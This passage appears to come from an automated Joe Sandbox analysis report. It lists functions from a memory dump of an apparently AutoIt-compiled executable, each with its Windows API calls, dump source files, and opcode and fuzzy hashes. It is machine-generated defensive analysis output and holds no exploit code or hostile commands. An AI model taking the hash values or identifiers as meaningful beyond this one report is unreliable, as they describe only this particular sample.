                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0019813C
                                                                                                                              • _free.LIBCMT ref: 0019814F
                                                                                                                              • InterlockedIncrement.KERNEL32(013F5FB0), ref: 00198167
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2704283638-0
                                                                                                                              • Opcode ID: 48dbf9cf9d439a0ab9d7c409a01c1afbf79cbe951bacc3691538dbdb10df283b
                                                                                                                              • Instruction ID: 07886e3ffd25ae236530f232cbfb46469337b82cfd3181909a40a7bf82073e3c
                                                                                                                              • Opcode Fuzzy Hash: 48dbf9cf9d439a0ab9d7c409a01c1afbf79cbe951bacc3691538dbdb10df283b
                                                                                                                              • Instruction Fuzzy Hash: 2A015231901622AFCF25AFA5A80A7AD7760BF06715F050169F81467A91CF346943CBD2
                                                                                                                              Function 00198724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __lock.LIBCMT ref: 00198768
                                                                                                                                • Part of subcall function 00198984: __mtinitlocknum.LIBCMT ref: 00198996
                                                                                                                                • Part of subcall function 00198984: RtlEnterCriticalSection.NTDLL(00190127), ref: 001989AF
                                                                                                                              • InterlockedIncrement.KERNEL32(DC840F00), ref: 00198775
                                                                                                                              • __lock.LIBCMT ref: 00198789
                                                                                                                              • ___addlocaleref.LIBCMT ref: 001987A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1687444384-0
                                                                                                                              • Opcode ID: bdb65039dd75d0f4e632a9d7f89551d4654b5cdee7efb27165b5c126f480fe21
                                                                                                                              • Instruction ID: 9952974421bac3488edab8d53abd3cfeaea8585525b9347608666f66b2c7ae29
                                                                                                                              • Opcode Fuzzy Hash: bdb65039dd75d0f4e632a9d7f89551d4654b5cdee7efb27165b5c126f480fe21
                                                                                                                              • Instruction Fuzzy Hash: 71016D71410B00EFDB20EFA5D809759F7E0BF60325F20890EE099976E0DB70A640CB02
                                                                                                                              Function 001B9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 001B9C7F
                                                                                                                                • Part of subcall function 001BAD14: _memset.LIBCMT ref: 001BAD49
                                                                                                                              • _memmove.LIBCMT ref: 001B9CA2
                                                                                                                              • _memset.LIBCMT ref: 001B9CAF
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 001B9CBF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 48991266-0
                                                                                                                              • Opcode ID: 2c2f9888afdd16fa62303a47ff4956785232cb63efd00832279333c2b21ca4b8
                                                                                                                              • Instruction ID: 8be53f23094c70666f684f34e45497167e8a3931d38046cb45fdbbc8d13ad855
                                                                                                                              • Opcode Fuzzy Hash: 2c2f9888afdd16fa62303a47ff4956785232cb63efd00832279333c2b21ca4b8
                                                                                                                              • Instruction Fuzzy Hash: D4F03A7A200000ABCF016F54EC85A9ABB2AEF55320B08C066FE089E227C775E951DBB5
                                                                                                                              Function 001DE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0018B5EB
                                                                                                                                • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B5FA
                                                                                                                                • Part of subcall function 0018B58B: BeginPath.GDI32(?), ref: 0018B611
                                                                                                                                • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B63B
                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001DE860
                                                                                                                              • LineTo.GDI32(00000000,?,?), ref: 001DE86D
                                                                                                                              • EndPath.GDI32(00000000), ref: 001DE87D
                                                                                                                              • StrokePath.GDI32(00000000), ref: 001DE88B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1539411459-0
                                                                                                                              • Opcode ID: ef3103dfa442bbda754ca67bbfd4375d0ecb4ae051c2ba95cc515d6e244b3cf4
                                                                                                                              • Instruction ID: 2301cc3ef06b05b09856c34093a39db23a77d350dc39584c61150aa38fe0120a
                                                                                                                              • Opcode Fuzzy Hash: ef3103dfa442bbda754ca67bbfd4375d0ecb4ae051c2ba95cc515d6e244b3cf4
                                                                                                                              • Instruction Fuzzy Hash: ADF0E231005259BBDB122F50BC0DFEE3F9AAF06311F008101FA01241E18B7946A2DFA9
                                                                                                                              Function 001AD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001AD640
                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 001AD653
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 001AD65A
                                                                                                                              • AttachThreadInput.USER32(00000000), ref: 001AD661
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2710830443-0
                                                                                                                              • Opcode ID: 503628e04e596cf9191305c5919ceec4450d20ef93bbbed51d5db79d6c41502d
                                                                                                                              • Instruction ID: fcff1cf33845a0802db2de649c98ea89962b4ec35370c23eda2734dae415d2eb
                                                                                                                              • Opcode Fuzzy Hash: 503628e04e596cf9191305c5919ceec4450d20ef93bbbed51d5db79d6c41502d
                                                                                                                              • Instruction Fuzzy Hash: C5E03971101228BADB201BA2BC0DEFB7F1EEF567B1F408010B50DC5861CB719580CBA0
                                                                                                                              Function 0018B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSysColor.USER32(00000008), ref: 0018B0C5
                                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 0018B0CF
                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0018B0E4
                                                                                                                              • GetStockObject.GDI32(00000005), ref: 0018B0EC
                                                                                                                              • GetWindowDC.USER32(?,00000000), ref: 001EECFA
                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 001EED07
                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 001EED20
                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 001EED39
                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 001EED59
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 001EED64
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1946975507-0
                                                                                                                              • Opcode ID: 09b4b44ecec9d4b8593fa994d8356125317ebfe8b4d3defadd3374e6382c2e15
                                                                                                                              • Instruction ID: d5682fd6d7b38c1bb88a706712e2d1a031b0905512d0ad5eef6abf05a384186f
                                                                                                                              • Opcode Fuzzy Hash: 09b4b44ecec9d4b8593fa994d8356125317ebfe8b4d3defadd3374e6382c2e15
                                                                                                                              • Instruction Fuzzy Hash: E8E0ED31504680AEEF215F75BC4D7AC3B62AB56336F148266F66A580E2C7714580DB11
                                                                                                                              Function 001EC0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2889604237-0
                                                                                                                              • Opcode ID: b0b763f9b958939423c68f3787744f6a8de392326294307a5ff1bb8d154b16d8
                                                                                                                              • Instruction ID: 8cb87510e11899d4a924bccc771bb21e1c1581127bad8b3b726d58b0dd9df3d9
                                                                                                                              • Opcode Fuzzy Hash: b0b763f9b958939423c68f3787744f6a8de392326294307a5ff1bb8d154b16d8
                                                                                                                              • Instruction Fuzzy Hash: EAE012B5500204EFDB006F70AC4CA7D3BEAEB48361F128805F84ACB650DBB49981CF40
                                                                                                                              Function 001EC0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2889604237-0
                                                                                                                              • Opcode ID: ef6249d58d09966cbd4a14acf00e7d1e4d3553839c627a9ed38ffd30d6efb508
                                                                                                                              • Instruction ID: c498d49344d932b04017859ebffb6a368e718ab39ec648b8524ac972e07e3d3b
                                                                                                                              • Opcode Fuzzy Hash: ef6249d58d09966cbd4a14acf00e7d1e4d3553839c627a9ed38ffd30d6efb508
                                                                                                                              • Instruction Fuzzy Hash: 59E092B5540204AFDB016F70AC4C67D7BEAEB48361F118415F94ACB651DBB99A81CF50
                                                                                                                              Function 001F2350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: >$DEFINE
                                                                                                                              • API String ID: 4104443479-1664449232
                                                                                                                              • Opcode ID: 3e55a8ea5806998577a29d468e00e95d11c4be55f5fa5a10e50ccaf712ba512f
                                                                                                                              • Instruction ID: 786c086abe0949e1cd59193854084b179ebcc551d097a405f8ca8d2c9d6fe51b
                                                                                                                              • Opcode Fuzzy Hash: 3e55a8ea5806998577a29d468e00e95d11c4be55f5fa5a10e50ccaf712ba512f
                                                                                                                              • Instruction Fuzzy Hash: A5126C75A0020ADFCF24CF98C490ABDB7B1FF48314F25815AE959AB395D774AD81CB90
                                                                                                                              Function 001AEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 001AECA0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContainedObject
                                                                                                                              • String ID: AutoIt3GUI$Container
                                                                                                                              • API String ID: 3565006973-3941886329
                                                                                                                              • Opcode ID: beca8a8361e48a31285d74944d2e0a73b11e689dea62aa3839a4442a4c4f66b2
                                                                                                                              • Instruction ID: 5e18b8209bde16d26f9e91c51c9d893e2f86036b790b70bbbc386b9cbb7ea133
                                                                                                                              • Opcode Fuzzy Hash: beca8a8361e48a31285d74944d2e0a73b11e689dea62aa3839a4442a4c4f66b2
                                                                                                                              • Instruction Fuzzy Hash: 4F910874600701EFDB14DFA4C884B6ABBF5BF49710B14856DE94ADB291DBB1E841CB60
                                                                                                                              Function 001BE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • __wcsnicmp.LIBCMT ref: 001BE785
                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 001BE84E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                              • String ID: LPT
                                                                                                                              • API String ID: 3222508074-1350329615
                                                                                                                              • Opcode ID: 504a4ae00cb4964c0a898435ec402024d74b2b77cbf84fe947241d6740bedecd
                                                                                                                              • Instruction ID: 63b1fd0c69967a57f2e93d6970cd56ca26eff998c92977ebdda2b34dcd940350
                                                                                                                              • Opcode Fuzzy Hash: 504a4ae00cb4964c0a898435ec402024d74b2b77cbf84fe947241d6740bedecd
                                                                                                                              • Instruction Fuzzy Hash: 45616F75A00615AFCB18EF94C895EEEB7F8EF18310F158069F546AB391DB70AE40CB91
                                                                                                                              Function 00171B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00171B83
                                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00171B9C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                              • Opcode ID: f23f8404488bfbbf4ff121cba41646e097422b28d422b602a9804d48198bfef8
                                                                                                                              • Instruction ID: 2bd9c1543966d63d9f1655f7e4a32f51ab49d68275432c97e668c1ed8f97d7c1
                                                                                                                              • Opcode Fuzzy Hash: f23f8404488bfbbf4ff121cba41646e097422b28d422b602a9804d48198bfef8
                                                                                                                              • Instruction Fuzzy Hash: D8516A71408744ABE321AF54D889BAFBBECFFA9354F81484DF5C8410A1EB71856DCB62
                                                                                                                              Function 001BCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017417D: __fread_nolock.LIBCMT ref: 0017419B
                                                                                                                              • _wcscmp.LIBCMT ref: 001BCF49
                                                                                                                              • _wcscmp.LIBCMT ref: 001BCF5C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                                                              • String ID: FILE
                                                                                                                              • API String ID: 4029003684-3121273764
                                                                                                                              • Opcode ID: a0c5f0199fa971ccb5a1f70b77f89dfbe6cd60a7f980ef7c8ff99fa15e2d5b24
                                                                                                                              • Instruction ID: 5878907074e08960f294562a0928c1bfef675ee80100abf02acecc8ad6ea83e9
                                                                                                                              • Opcode Fuzzy Hash: a0c5f0199fa971ccb5a1f70b77f89dfbe6cd60a7f980ef7c8ff99fa15e2d5b24
                                                                                                                              • Instruction Fuzzy Hash: 8D41D432A00219BBDF11EBA4CC81FEFBBBA9F59710F000469F615E7191D771AA44C790
                                                                                                                              Function 001DA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001DA668
                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001DA67D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
